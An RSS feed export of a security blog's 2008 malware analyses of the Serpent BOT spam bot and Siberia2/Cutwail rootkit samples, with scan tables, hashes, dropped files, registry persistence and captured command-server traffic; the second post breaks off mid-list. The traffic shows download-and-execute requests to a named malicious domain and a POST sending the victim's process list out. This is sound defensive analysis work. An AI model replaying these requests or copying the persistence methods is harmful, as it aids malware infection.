<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>NoVirusThanks Blog &#187; Spam.Bot</title>
	<atom:link href="http://blog.novirusthanks.org/tag/spambot/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.novirusthanks.org</link>
	<description>Security News and Malware Analysis</description>
	<lastBuildDate>Wed, 01 Feb 2012 13:34:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Serpent BOT (Web Based Malware)</title>
		<link>http://blog.novirusthanks.org/2008/11/serpent-bot-web-based-malware-analysis/</link>
		<comments>http://blog.novirusthanks.org/2008/11/serpent-bot-web-based-malware-analysis/#comments</comments>
		<pubDate>Sun, 23 Nov 2008 01:00:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Cutwail.D]]></category>
		<category><![CDATA[load.exe]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[rootkit]]></category>
		<category><![CDATA[Spam.Bot]]></category>
		<category><![CDATA[WinCtrl32.dll]]></category>
		<category><![CDATA[Winkk44.sys]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=312</guid>
		<description><![CDATA[Steve sent me another sample of malware he found, but this time, we found a Web Based Malware with a web-interface: &#160; &#160; The file that established connections with the website was named load.exe and below there is the report of the scan: Report Generated 22.11.2008 at 23.15.36 (GMT 1) Filename: load.exe File size: 27 [...]]]></description>
			<content:encoded><![CDATA[<p>Steve sent me another sample of malware he found, but this time, we found a Web Based Malware with a web-interface:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_mainpage2.gif" alt="Web Based Malware" title="Web Based Malware" width="530" height="430" /></p>
<p>&nbsp;</p>
<p>The file that established connections with the website was named load.exe and below there is the report of the scan:</p>
<blockquote><p>
Report Generated 	22.11.2008 at 23.15.36 (GMT 1)<br />
Filename: 	<b>load.exe</b><br />
File size: 	27 KB<br />
MD5 Hash: 	97A860C202A8016E08818F3AA90525B8<br />
SHA1 Hash: 	CADF466ABD29CD993DD81EC838282589D0077BAC<br />
CRC32: 	89416946<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Microsoft Visual C++ 6.0<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
Detection Rate:	<span style="color: red;">23</span> on 23</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Downloader.Agent!IK</span><br />
Avira AntiVir 	<span style="color: red;">TR/Dldr.Agent.agl</span><br />
Avast 	<span style="color: red;">Win32:Small-JMK [Trj] (0)</span><br />
AVG 	<span style="color: red;">Trojan horse Downloader.Zlob.12.R</span><br />
BitDefender 	<span style="color: red;">Trojan.Crypt.AI</span><br />
ClamAV 	<span style="color: red;">Worm.Socks-11</span><br />
Comodo 	<span style="color: red;">TrojWare.Win32.PSW.Agent.NHG</span><br />
Dr.Web 	<span style="color: red;">Trojan.PWS.Pace</span><br />
Ewido 	<span style="color: red;">Downloader.Agent.llo</span><br />
F-PROT 6 	<span style="color: red;">W32/Socks.A.gen!Eldorado (generic, not disinfectable)</span><br />
G DATA 	<span style="color: red;">Trojan-Downloader.Win32.Agent.llo A</span><br />
IkarusT3 	<span style="color: red;">Trojan-Downloader.Agent</span><br />
Kaspersky 	<span style="color: red;">Trojan-Downloader.Win32.Agent.llo</span><br />
McAfee 	<span style="color: red;">BackDoor-DRW trojan</span><br />
MHR (Malware Hash Registry) 	<span style="color: red;">Virus Found &#8211; detect rate 75%</span><br />
NOD32 v3 	<span style="color: red;">Win32/PSW.Agent.NHG trojan</span><br />
Norman 	<span style="color: red;">Trojan W32/Agent.EXZF ()</span><br />
QuickHeal 	<span style="color: red;">TrojanDownloader.Agent.llo</span><br />
Solo Antivirus 	<span style="color: red;">Infection TrojanDropper.Win32.Small.Bgx</span><br />
Sophos 	<span style="color: red;">Troj/Dloadr-BMT</span><br />
TrendMicro 	<span style="color: red;">WORM_SOCKS.BL</span><br />
VBA32 	<span style="color: red;">Trojan-Downloader.Win32.Agent.llo</span><br />
VirusBuster 	<span style="color: red;">Trojan.DL.Agent.ETEH</span>
</p></blockquote>
<p>When I executed this load.exe file, a lot of traffic was established with this domain:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">kolonka17.cn</pre></td></tr></table></div>

<p>Internet traffic:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/?&amp;amp;v=ver&amp;amp;s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn</pre></td></tr></table></div>

<p>With the traffic below, another executable file named win.exe will be downloaded and executed in my system:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/manda.php?id=-695459345&amp;amp;v=ver&amp;amp;s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Server: Apache/2
Content-length: 29
&nbsp;
hxxp://kolonka17.cn/win.exe|5
&nbsp;
GET /win.exe HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf</pre></td></tr></table></div>

<p>Next we see new traffic to a new domain, where it sends a lot of encrypted data:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0
Host: 69.147.239.106
&nbsp;
HTTP/1.0 200 OK
Date: Sat, 22 Nov 2008 09:04:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT
Cache-Control: no-cache
Content-Length: 107532
Connection: close
Content-Type: application/octet-stream
...</pre></td></tr></table></div>

<p>And below there is some interesting traffic:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/manda.php?id=-789987028&amp;amp;l=5&amp;amp;v=ver&amp;amp;s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:06 GMT
Server: Apache/2
Content-Length: 2
&nbsp;
ok
&nbsp;
GET /loader/proc_kill HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:07 GMT
Server: Apache/2
Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT
Content-Length: 185
Content-Type: text/plain
&nbsp;
regedit.exe
msconfig.exe
taskmgr.exe
reg.exe
taskkill.exe
tskill.exe
tasklist.exe
infium.exe
notepad.exe
explorer.exe
nod32kui.exe
nod32kui.exe
egui.exe
egui.exe
putty.exe</pre></td></tr></table></div>

<p>The malware now gets the command to kill a list of processes on my system:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/proc_kill HTTP/1.1</pre></td></tr></table></div>

<p>But the malware will not stop at just killing the processes! The malware will also <strong>delete</strong> some important executable files of the system, such as:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">C:\WINDOWS\explorer.exe</pre></td></tr></table></div>

<p>In the new traffic below we can see the malware received another command:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">GET /loader/proc_run HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:14 GMT
Server: Apache/2
Content-Length: 30
Content-Type: text/plain
&nbsp;
none.exe
taskmon.exe
qip.exe
&nbsp;
GET /loader/proc_killsize HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:10 GMT
Server: Apache/2
Content-Length: 40
Content-Type: text/plain
&nbsp;
tasklis2t.exe
inf3ium.exe
note4pad.exe</pre></td></tr></table></div>

<p>And is always related to process killing. After, we sent new traffic to the domain:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">POST /loader/data.php?id=-789987028 HTTP/1.1
Host: kolonka17.cn
Content-Type: application/x-www-form-urlencoded
Content-length: 289
&nbsp;
proc=[System Process]
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
spoolsv.exe
explorer.exe
alg.exe
wscntfy.exe
ufo.exe
load.exe
14B.tmp
size=12800
0
0
0
108032
13312
14336
57856
13824
51200
27648
12800
&nbsp;
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:22 GMT
Content-Length: 0
Content-Type: text/html</pre></td></tr></table></div>

<p>We can see the malware has sent some information related to the current running processes of my system !! But note we have also sent the size of each process ! This information can be used by future malware versions, maybe to create some evading-code or to detect certain processes &#8220;not much loved&#8221; by the malware.</p>
<p>&nbsp;</p>
<p>Next we received some traffic in the SMTP (25) port:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">Protocol          : TCP
Local Address     : 64.233.183.27
Local Port        : 25
&nbsp;
220 mx.google.com ESMTP k5si310246nfh.0
&nbsp;
Protocol          : TCP
Local Address     : 209.85.135.114
Local Port        : 25
&nbsp;
220 mx.google.com ESMTP n10si1763302mue.37
&nbsp;
Protocol          : TCP
Local Address     : 94.100.176.20
Local Port        : 25
&nbsp;
220 Mail.Ru ESMTP
&nbsp;
Protocol          : TCP
Local Address     : 216.157.145.27
Local Port        : 25
&nbsp;
220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008</pre></td></tr></table></div>

<p>And a new driver is loaded by the malware:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">C:\WINDOWS\system32\drivers\Winkk44.sys</pre></td></tr></table></div>

<p>Report of the scan:</p>
<blockquote><p>
Report Generated 	22.11.2008 at 23.32.46 (GMT 1)<br />
Filename: 	<b>Winkk44.sys</b><br />
File size: 	32 KB<br />
MD5 Hash: 	286C4C43EFED1D81C59AA7BC70B83BD8<br />
SHA1 Hash: 	4D09AC6BE2808360697E7ECA71BEBF7CADFDE985<br />
CRC32: 	2495620378<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found [Overlay] *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
Detection Rate:	<span style="color: red;">7</span> on 24</p>
<p>&nbsp;</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Dropper.Cutwail!IK</span><br />
Avira AntiVir 	-<br />
Avast 	-<br />
AVG 	<span style="color: red;">Virus found BackDoor.Ntrootkit</span><br />
BitDefender 	<span style="color: red;">Trojan.Dropper.Cutwail.D</span><br />
ClamAV 	-<br />
Comodo 	-<br />
Dr.Web -<br />
Ewido 	-<br />
F-PROT 6 	-<br />
G DATA 	<span style="color: red;">Trojan-Downloader.Win32.Mutant.aim A</span><br />
IkarusT3 	<span style="color: red;">Trojan-Dropper.Cutwail</span><br />
Kaspersky 	<span style="color: red;">Trojan-Downloader.Win32.Mutant.aim</span><br />
McAfee 	-<br />
MHR (Malware Hash Registry) 	-<br />
NOD32 v3 	-<br />
Norman 	-<br />
Panda 	-<br />
QuickHeal 	-<br />
Solo Antivirus 	<span style="color: red;">Infection TrojanDownloader.Win32.Mutant.Aim</span><br />
Sophos 	-<br />
TrendMicro 	-<br />
VBA32 	-<br />
VirusBuster 	-
</p></blockquote>
<p>Again a <font color="red">Trojan.Dropper.Cutwail.D</font> !</p>
<p>&nbsp;</p>
<p>Below there are some interested strings extracted from Winkk44.sys:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">winlogon.exe
e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb
EXERESOURCE
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32
Asynchronous
Impersonate
StartShell
DLLName
WLEventStartShell
WinCtrl32.dll
\SystemRoot\system32\WinCtrl32.dll
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Rntm74
\Device\Rntm74
\SystemRoot\system32\drivers\
\FileSystem
Winkk44.sys</pre></td></tr></table></div>

<p>As we can see from the image below, this driver is auto-loaded when the Operating System boots in Safe Mode:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_safemode_startup.gif" alt="Kernel driver loaded in safe mode" title="Kernel driver loaded in safe mode" width="530" /></p>
<p>&nbsp;</p>
<p>During the analysis, were not detected SSDT/Shadow SSDT Hooks, no Stealth Code, I get BSOD when trying to open certain Anti-Rootkit software, the file <strong>Winkk44_sys</strong> is protected from changing/modification/deletion and also the registry keys are protected from changing/modification/deletion.</p>
<p>&nbsp;</p>
<p>Running processes that are visible with taskmanager:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_processi.gif" alt="Running processes" title="Running processes" /></p>
<p>&nbsp;</p>
<p>Registry keys used by the malware to startup with Windows:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_startup.gif" alt="Registry keys" title="Registry keys" /></p>
<p>&nbsp;</p>
<p>Service info:</p>
<p>&nbsp;</p>
<p><img src="http://blog.novirusthanks.org/wp-content/uploads/Serpent_BOT_service_info.gif" alt="Registry keys of the rootkit driver" title="Registry keys of the rootkit driver" /></p>
<p>&nbsp;</p>
<p>These are the malware traces we can see from an HijackThis log:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
&nbsp;
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe</pre></td></tr></table></div>

<p>Below there is a small summary of the files created by the malware:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
</pre></td><td class="code"><pre class="text" style="font-family:monospace;">C:\WINDOWS\system32\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\ftpdll.dll
C:\WINDOWS\system32\WinCtrl32.dll
C:\WINDOWS\system32\fklame32.dll
C:\WINDOWS\system32\drivers\ctfmon.exe
C:\WINDOWS\system32\drivers\Winkk44.sys
C:\WINDOWS\system32\drivers\555.exe</pre></td></tr></table></div>

]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2008/11/serpent-bot-web-based-malware-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Rootkit.Siberia2 + Rootkit.Cutwail.A &#8211; Analysis</title>
		<link>http://blog.novirusthanks.org/2008/11/rootkitcutwaila-rootkitsiberia2-analysis/</link>
		<comments>http://blog.novirusthanks.org/2008/11/rootkitcutwaila-rootkitsiberia2-analysis/#comments</comments>
		<pubDate>Thu, 20 Nov 2008 18:04:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[ati5ssxx.sys]]></category>
		<category><![CDATA[BHO]]></category>
		<category><![CDATA[Cutwail.A]]></category>
		<category><![CDATA[DosDevices]]></category>
		<category><![CDATA[explorer.exe]]></category>
		<category><![CDATA[fastfat.sys]]></category>
		<category><![CDATA[Filt]]></category>
		<category><![CDATA[hooks]]></category>
		<category><![CDATA[iexplore.exe]]></category>
		<category><![CDATA[inject]]></category>
		<category><![CDATA[IRP]]></category>
		<category><![CDATA[kernel driver]]></category>
		<category><![CDATA[mailgrab]]></category>
		<category><![CDATA[NDIS.SYS]]></category>
		<category><![CDATA[ntfs.sys]]></category>
		<category><![CDATA[ntoskrnl.exe]]></category>
		<category><![CDATA[Prot3]]></category>
		<category><![CDATA[rooktit]]></category>
		<category><![CDATA[Rootkit.Siberia2]]></category>
		<category><![CDATA[SafeBoot]]></category>
		<category><![CDATA[services.exe]]></category>
		<category><![CDATA[siberia2]]></category>
		<category><![CDATA[Spam.Bot]]></category>
		<category><![CDATA[tcpsr.sys]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://novirusthanks.org/blog/?p=289</guid>
		<description><![CDATA[Analysis Content: Rootkit.Siberia2 + Rootkit.Cutwail.A &#8211; Analysis Released: 20.11.2008 Author of Analysis: Robert Contact: robert@novirusthanks.org Website: http://novirusthanks.org Steve sent me another rootkit sample and here is the analysis : ) The file I received was named mtnjmcjubjjuyto.exe and below there is the report of the scan: Report Generated 20.11.2008 at 16.47.12 (GMT 1) Time for [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>Analysis Content: Rootkit.Siberia2 + Rootkit.Cutwail.A &#8211; Analysis<br />
Released: 20.11.2008<br />
Author of Analysis: Robert<br />
Contact: robert@novirusthanks.org<br />
Website: http://novirusthanks.org</p>
</blockquote>
<p>Steve sent me another rootkit sample and here is the analysis : )</p>
<p>The file I received was named <strong>mtnjmcjubjjuyto.exe</strong> and below there is the report of the scan:</p>
<blockquote><p>Report Generated 	20.11.2008 at 16.47.12 (GMT 1)<br />
Time for scan: 	22 seconds<br />
Filename: 	mtnjmcjubjjuyto.exe<br />
File size: 	9 KBF<br />
MD5 Hash: 	7499B7C5951B6A46689E5C387EFADC66<br />
SHA1 Hash: 	056FE023F0906C9C99E16674D6E673C39823BF84<br />
CRC32: 	1125039963<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">9</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan.Win32.Meredrop!IK</span><br />
Avira AntiVir 	<span style="color: red;">HEUR/Crypted</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: red;">Trojan horse Downloader.Generic_r.BT</span><br />
BitDefender 	<span style="color: green;">Nothing found!</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA <span style="color: red;"> Trojan-Downloader.Win32.Agent.apsz A</span><br />
IkarusT3 	<span style="color: red;">Trojan.Win32.Meredrop</span><br />
Kaspersky 	<span style="color: red;">Trojan-Downloader.Win32.Agent.apsz</span><br />
McAfee 	<span style="color: red;">Generic Dropper trojan</span><br />
NOD32 v3 	<span style="color: red;">probably a variant of Win32/Kryptik.BJ trojan</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus <span style="color: green;"> Nothing found!</span><br />
Sophos 	<span style="color: red;">Sus/Behav-273</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: green;">Nothing found!</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>After the execution of the above file, were created new files:</p>
<blockquote><p>C:\ebafud.exe<br />
C:\WINDOWS\system32\rs32net.exe</p>
</blockquote>
<p>And a new process was visible in Task Manager with the name of <strong>rs32net.exe</strong>.</p>
<p>Below there is the report of the scan:</p>
<blockquote><p>Report Generated 	20.11.2008 at 16.53.35 (GMT 1)<br />
Time for scan: 	29 seconds<br />
Filename: 	rs32net.exe<br />
File size: 	22 KB<br />
MD5 Hash: 	D3185511968F2F5A8A68FA9F67CCED2F<br />
SHA1 Hash: 	4254F0920877984724446BF6BCF0E764E27ADF07<br />
CRC32: 	1940657006<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">1</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: green;">Nothing found!</span><br />
Avira AntiVir 	<span style="color: red;">TR/Dropper.Gen</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: green;">Nothing found!</span><br />
BitDefender 	<span style="color: green;">Nothing found!</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA <span style="color: green;"> Nothing found!</span><br />
IkarusT3 	<span style="color: green;">Nothing found!</span><br />
Kaspersky 	<span style="color: green;">Nothing found!</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos 	<span style="color: green;">Nothing found!</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: green;">Nothing found!</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>New files were created after some seconds:</p>
<blockquote><p>C:\njkkjh.exe<br />
C:\nfgo.exe<br />
C:\duhtvwns.exe<br />
C:\WINDOWS\system32\jsne87fidgf.dll<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\winlogin.exe</p>
</blockquote>
<blockquote><p>Report Generated 	20.11.2008 at 16.51.56 (GMT 1)<br />
Time for scan: 	26 seconds<br />
Filename: 	jsne87fidgf.dll<br />
File size: 	9 KB<br />
MD5 Hash: 	619BF3607989002B551E830ED151E8D9<br />
SHA1 Hash: 	C0776DD69B723793D477CD05A0C18236A319491D<br />
CRC32: 	3590387388<br />
Application Type:	Dinamyc Link Library (DLL) 32bit<br />
Packer detected:	Nothing found [Overlay] *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">3</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Clicker.Win32.Klik!IK</span><br />
Avira AntiVir 	<span style="color: red;">TR/Fakealert.HO</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: green;">Nothing found!</span><br />
BitDefender 	<span style="color: green;">Nothing found!</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: green;">Nothing found!</span><br />
IkarusT3 	<span style="color: green;">Nothing found!</span><br />
Kaspersky 	<span style="color: green;">Nothing found!</span><br />
McAfee 	<span style="color: green;">Nothing found!</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos 	<span style="color: red;">Troj/Agent-IHC</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: green;">Nothing found!</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>We can see that this .DLL looks like a BHO (Browser Helper Objects) and it is <strong>injected</strong> into 2 processes:<br />
-<strong>IEXPLORE.EXE</strong><br />
-<strong>explorer.exe</strong></p>
<p>Below there is the report of the scan of <strong>winlogin.exe</strong>:</p>
<blockquote><p>Report Generated 	20.11.2008 at 17.00.37 (GMT 1)<br />
Time for scan: 	29 seconds<br />
Filename: 	winlogin.exe<br />
File size: 	14 KB<br />
MD5 Hash: 	FA14206DC72A8EC78B0D3E07F1DB8F73<br />
SHA1 Hash: 	1ABD0114E7AEFA3381B95BADCE96AE9294D0D7AF<br />
CRC32: 	4292284846<br />
Application Type:	Executable (EXE) 32bit<br />
Packer detected:	Nothing found [Overlay] *<br />
Self-Extract Archive: 	Nothing found<br />
Binder Detector: 	Nothing found<br />
ASCII Strings: 	View<br />
Detection Rate:	<span style="color: red;">5</span> on 23</p>
<p>Antivirus 	Result<br />
a-squared 	<span style="color: red;">Trojan-Clicker.Win32.Klik!IK</span><br />
Avira AntiVir 	<span style="color: red;">TR/Fakealert.HO</span><br />
Avast 	<span style="color: green;">Nothing found!</span><br />
AVG 	<span style="color: green;">Nothing found!</span><br />
BitDefender 	<span style="color: green;">Nothing found!</span><br />
ClamAV 	<span style="color: green;">Nothing found!</span><br />
Comodo 	<span style="color: green;">Nothing found!</span><br />
Dr.Web 	<span style="color: green;">Nothing found!</span><br />
Ewido 	<span style="color: green;">Nothing found!</span><br />
F-PROT 6 	<span style="color: green;">Nothing found!</span><br />
G DATA 	<span style="color: green;">Nothing found!</span><br />
IkarusT3 	<span style="color: green;">Nothing found!</span><br />
Kaspersky 	<span style="color: green;">Nothing found!</span><br />
McAfee 	<span style="color: red;">Generic FakeAlert.d trojan</span><br />
NOD32 v3 	<span style="color: green;">Nothing found!</span><br />
Norman 	<span style="color: green;">Nothing found!</span><br />
Panda 	<span style="color: green;">Nothing found!</span><br />
QuickHeal 	<span style="color: green;">Nothing found!</span><br />
Solo Antivirus 	<span style="color: green;">Nothing found!</span><br />
Sophos 	<span style="color: red;">Troj/Dloadr-CAD</span><br />
TrendMicro 	<span style="color: green;">Nothing found!</span><br />
VBA32 	<span style="color: red;">Win32 Shadow AutoStart Install</span><br />
VirusBuster 	<span style="color: green;">Nothing found!</span></p>
</blockquote>
<p>After, new files were created:</p>
<blockquote><p>C:\psqrhqn.exe<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\bat9.tmp.bat<br />
C:\mfglmypk.exe<br />
C:\DOCUME~1\user899\LOCALS~1\Temp\BAT9TM~1.BAT<br />
C:\cvqkuk.exe<br />
C:\naxv.exe<br />
C:\WINDOWS\system32\fklame32.dll<br />
C:\cvqkuk.exe<br />
